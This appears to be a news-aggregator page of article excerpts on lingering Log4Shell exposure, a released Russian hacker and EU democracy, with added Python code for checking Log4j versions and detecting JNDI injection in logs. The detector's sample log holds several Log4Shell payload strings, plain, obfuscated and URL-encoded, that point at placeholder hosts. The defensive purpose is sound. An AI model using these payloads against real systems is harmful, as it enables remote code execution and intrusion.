
Public interest in Log4Shell fades but attack surface remains



It has been four months since Log4Shell, a critical zero-day vulnerability in the ubiquitous Apache Log4j logging library, was disclosed, and threat analysts warn that adoption of the available fixes still lags badly.

Although the public interest and focus of the infosec community have moved to newer vulnerabilities and exploits, Log4Shell continues to be a large-scale problem and a grave security risk.

The last time we touched the subject of Log4Shell exploitation was roughly two months ago when a Barracuda report highlighted that it was primarily botnets that leveraged it for DDoS and cryptocurrency mining.

However, a new report published today by Rezilion paints a dire picture, revealing a large attack surface across a wide range of software products.

This is a severe problem because of the potential impact (unauthenticated remote code execution) and the ease of exploitation (public proof-of-concept exploits are readily available).

Log4Shell bug discovery and fixing timeline (Rezilion)

A problem that’s still there

According to Rezilion’s report, which draws on data from several sources, Log4Shell, tracked as CVE-2021-44228, is still present in so many software products that it is hard to find a reasonable explanation for it.

For example, Sonatype’s Log4j Download Dashboard shows that almost 40% of Log4j downloads were still of vulnerable versions at the end of April, a share that has held steady for months.

Log4j version downloads (Sonatype)

While this was previously attributed to security researchers, analysts, or threat actors testing their exploits, a share that stays this high after all this time makes those explanations implausible.

Looking at data from Google’s Open Source Insights service, Rezilion found that of the 17,840 open-source packages that use Log4j as a dependency, only 7,140 had upgraded to a fixed version. Hence, roughly 60% of them remain vulnerable to Log4Shell.

Open-source software using vulnerable Log4j versions (Rezilion)
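Download dashboards and ecosystem-wide scans say nothing about a particular build. The check a practitioner actually needs is against their own dependency tree. The following is an added example, not code from the Rezilion report or from the Log4j project: it parses constructed `mvn dependency:tree` output and classifies each `log4j-core` coordinate against the CVE-2021-44228 range from the Apache advisory (2.0-beta9 up to but not including 2.15.0, with the backported security releases 2.12.2 and 2.3.1 treated as fixed). The sample tree, the module names and the status strings are assumptions made up for the example.

```python
import re

# One line of `mvn dependency:tree` output, e.g.
#   [INFO] +- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
DEP_LINE = re.compile(
    r"org\.apache\.logging\.log4j:(?P<artifact>[\w.-]+):jar:(?P<version>[\w.-]+):(?P<scope>\w+)"
)
# Log4j version strings: 2.14.1, 2.0, 2.0-beta9, 2.0-rc1, 1.2.17
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$")


def version_key(version):
    """Turn a Log4j version string into a sortable tuple (beta < rc < final)."""
    m = VERSION_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised Log4j version string: {version}")
    major, minor, patch, tag, num = m.groups()
    stage = {"beta": 0, "rc": 1, None: 2}[tag]
    return (int(major), int(minor), int(patch or 0), stage, int(num or 0))


FIRST_AFFECTED = version_key("2.0-beta9")   # JNDI lookup introduced here
FIRST_FIXED = version_key("2.15.0")         # mainline fix for CVE-2021-44228


def classify(artifact, version):
    """Status of one Log4j artifact/version pair with respect to CVE-2021-44228."""
    if artifact != "log4j-core":
        # log4j-api alone does not carry the JNDI lookup code
        return "not affected (only log4j-core carries the JNDI lookup)"
    key = version_key(version)
    if key[0] < 2:
        return "log4j 1.x: not affected by CVE-2021-44228 (end of life)"
    if key < FIRST_AFFECTED:
        return "not affected"
    # Security releases backported to the Java 7 (2.12.x) and Java 6 (2.3.x) lines
    if (key[:2] == (2, 12) and key[2] >= 2) or (key[:2] == (2, 3) and key[2] >= 1):
        return "fixed"
    if key < FIRST_FIXED:
        return "vulnerable (CVE-2021-44228)"
    return "fixed"


def scan_dependency_tree(text):
    """Return (artifact, version, status) for every Log4j coordinate in the tree."""
    findings = []
    for line in text.splitlines():
        m = DEP_LINE.search(line)
        if m:
            art, ver = m.group("artifact"), m.group("version")
            findings.append((art, ver, classify(art, ver)))
    return findings


# Constructed sample tree for a hypothetical com.example:orders module (not real output)
SAMPLE_TREE = r"""
[INFO] com.example:orders:jar:1.0.0
[INFO] +- org.apache.logging.log4j:log4j-api:jar:2.14.1:compile
[INFO] +- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO] +- com.example:legacy-reports:jar:3.2.0:compile
[INFO] |  \- org.apache.logging.log4j:log4j-core:jar:2.12.2:compile
[INFO] \- org.slf4j:slf4j-api:jar:1.7.32:compile
"""

if __name__ == "__main__":
    for artifact, version, status in scan_dependency_tree(SAMPLE_TREE):
        print(f"{artifact}:{version}\t{status}")
```

The version ordering matters for the pre-release tags: `2.0-beta9` and `2.0-rc1` sit inside the affected range and a naive string comparison would misplace them. A `fixed` result here only means the JNDI remote-class-loading bug is closed; later Log4j releases addressed further issues, so the practical target is still the latest 2.x release, as the Barracuda guidance further down the page recommends.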

Searching Shodan for internet-facing instances of open-source software, Rezilion found over 90,000 potentially vulnerable applications that embed obsolete versions of Log4j. A notable example is Apache Solr, with 1,657 public deployments…

Source…

Mystery remains on why US released prominent Russian hacker


The Justice Department has declined to give a clear explanation of why a well-known Russian hacker was sent home last year, even as President Joe Biden warns that the Kremlin may soon carry out cyberattacks against the United States.

Aleksei Burkov is a cybercriminal who ran two well-known underground hacking operations. After he was arrested by Israeli law enforcement in 2015, the Kremlin worked hard to prevent his extradition to the U.S. Burkov eventually arrived in the U.S. in 2019, where he pleaded guilty to a host of crimes and received a nine-year sentence, with credit for the time spent in Israeli prison.

But he was mysteriously deported back to Russia in late September, years before the sentence was completed.

Bryan Vorndran, the assistant director of the FBI’s Cyber Division, was unable to explain why during a House Judiciary Committee hearing Tuesday when pressed by Rep. Jim Jordan, an Ohio Republican.

“Mr. Burkov was investigated by the U.S. Secret Service, not by the FBI,” Vorndran said. “I don’t know specifics. What I do know is that there was no swap or concession.”

He said it was “a Department of Justice question” when asked why Burkov was let go.

Jordan asked if letting Burkov go was a good idea, and he replied he wasn’t in a position to comment, leading the Ohio Republican to say, “The head of cyber is not in a position to comment.” Vorndran said only that “it was a Department of Justice decision through the U.S. courts process.”

Jordan asked, “Do you think it helps to release the most notorious Russian hacker we’ve ever apprehended?”

“I’m not going to answer any questions about Mr. Burkov,” Vorndran replied. “It’s a Secret Service case.”


President Joe Biden spoke at a business roundtable last week in which he warned about the likelihood Putin would deploy cyberattacks.

“As I’ve said, the magnitude of Russia’s cyber capacity is fairly consequential,…

Source…

Log4Shell threat remains extremely high


The volume of cyber attacks targeting the Log4Shell family of vulnerabilities in Log4j remains extremely high, according to Barracuda Networks.

New Threat Spotlight analysis from cloud-enabled security solutions provider Barracuda Networks says that although the Log4Shell vulnerabilities have now been public for more than two months, the volume of attempted exploitation has remained roughly constant over that period, with a few dips and spikes.

It is predicted that this attack pattern will continue, given the popularity of the software, the exploitability of the vulnerability, and the payoff when a compromise happens.

Geographically, Barracuda Networks found that 83 per cent of the attacks on its systems came from IP addresses in the United States, with 50 per cent of those associated with Amazon Web Services and other large data centres.

Threats analysed also came from Japan, Germany, Netherlands, and Russia.

The UK National Cyber Security Centre has previously advised individuals and businesses to be alert to the threat and to ensure all devices are regularly updated.

Log4Shell is a vulnerability in Log4j, a Java-based logging framework maintained as an Apache project and used by many major organisations such as Apple, Amazon and Twitter. Attackers can exploit the vulnerabilities in systems running affected versions to break into IT environments, steal passwords, extract data and infect networks with malicious software.

Researchers at Barracuda Networks found a variety of payloads, ranging from videos of Rick Astley’s “Never Gonna Give You Up” to cryptocurrency miners and Distributed Denial of Service (DDoS) malware. They believe threat actors are working to build out a large botnet and expect large DDoS attacks in the near future.
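The attack traffic Barracuda describes is easy to spot in its plain form but is routinely wrapped in Log4j’s own lookup syntax (`${lower:j}`, `${::-j}`, `${env:X:-j}`) and URL-encoded so that a naive `${jndi:` match misses it. The following is an added example, not Barracuda’s detection logic: it normalises those obfuscation families, including one URL-decoding pass, and then reports the JNDI scheme and target from each suspicious request. The access-log lines are constructed for the example, and the hosts and ports in them are placeholders.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one whose body contains no further ${ or }
INNER = re.compile(r"\$\{([^${}]*)\}")
# The payload we are looking for once obfuscation has been stripped: ${jndi:<scheme>:<target>}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):([^}]*)\}", re.I)


def _resolve(m):
    """Evaluate one innermost lookup the way Log4j's StrSubstitutor would, for the
    obfuscation families seen in the wild; anything else is left untouched."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)                  # the payload itself: keep it for the detector
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]      # ${any:thing:-X} falls back to the default X
    return m.group(0)                      # unknown lookup (e.g. ${hostname}): leave as is


def normalize(text, max_rounds=20):
    """URL-decode once, then collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):            # bounded so pathological input cannot spin
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def detect(lines):
    """Return one finding per JNDI lookup found in the given log lines."""
    findings = []
    for number, line in enumerate(lines, 1):
        for m in JNDI.finditer(normalize(line)):
            findings.append({
                "line": number,
                "scheme": m.group(1).lower(),
                "target": m.group(2).lstrip("/"),
                "raw": line,
            })
    return findings


# Constructed access-log lines (not real traffic); 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Feb/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Feb/2022:10:01:05 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.23 - - [10/Feb/2022:10:02:11 +0000] "GET /${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/o} HTTP/1.1" 404 0',
    '198.51.100.23 - - [10/Feb/2022:10:02:12 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fx%7D HTTP/1.1" 200 12',
    '203.0.113.9 - - [10/Feb/2022:10:03:40 +0000] "GET /docs HTTP/1.1" 200 900 "-" "curl/7.79 ${env:HOME} ${hostname}"',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"line {f['line']}: jndi scheme={f['scheme']} target={f['target']}")
```

Two caveats for anyone adapting this. It resolves only the `lower`, `upper` and default-value (`:-`) forms plus one layer of URL encoding; other lookups are deliberately left alone, so it is a triage aid rather than a guarantee of coverage. And because a vulnerable Log4j evaluates the string wherever it ends up being logged, not only in the request line, the same normalisation should be run over every logged field (headers, user agents, form values), which is why patching, rather than pattern matching, is the fix.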

“Due to the growing number of vulnerabilities found in web applications, it is getting progressively more complex to guard against attacks,” said Tushar Richabadas, product marketing manager, Barracuda Networks.

“The best way to protect against Log4Shell specifically is to upgrade to the latest version of Log4J. Maintaining up-to-date software and libraries helps ensure that…

Source…

The EU Remains the Best Advocate for Global Democracy


Russian president Vladimir Putin enjoys running circles around the European Union (EU). China can cherry-pick partners among EU members. Turkey can destabilise the region by releasing migrants. Even Belarus challenges the EU in a way that would have been unthinkable only a few years ago. Events may yet take a turn for the worse in the Caucasus, Bosnia-Herzegovina, and Ukraine, with rumours of military action by Russia.

Europe’s lack of hard power may be laid bare in the months to come. Europe is not projecting military power, not invading other countries, not threatening neighbors, not waging cyber warfare, and not operating a global intelligence network. It is also not using its considerable economic power to pursue political goals.

These weaknesses, in a strange way, also reveal Europe’s sole strength.

Europe is gradually becoming the last genuine defender of democracy and human rights. A few countries outside Europe may also claim this title, but they are few and far between. Europe is not flawless, but compared with illiberal democracies and autocratic or authoritarian regimes, it remains a beacon.

The EU is often depicted as an undemocratic bureaucracy run by technocrats in Brussels. This is incorrect. No decision is taken by the EU without approval in the European Council. Each member state is represented by a minister sent by their national government and held accountable by their national parliament. Most decisions require the consent of both the Council and the European Parliament, which is composed of 705 members elected directly by the European people. This relationship between the Council and the Parliament is somewhat akin to that of the Senate and the House of Representatives in the United States, but less confrontational. The European Commission, the executive institution of the EU, consists of one member nominated by each member state. The Commission can only take office after a vote of approval in the directly elected European Parliament. The Parliament also has the ability to dismiss and dissolve the European Commission.

Several countries in Central and Eastern Europe are not role models of democracy. But this critique is overblown. Observers outside Central and Eastern Europe…

Source…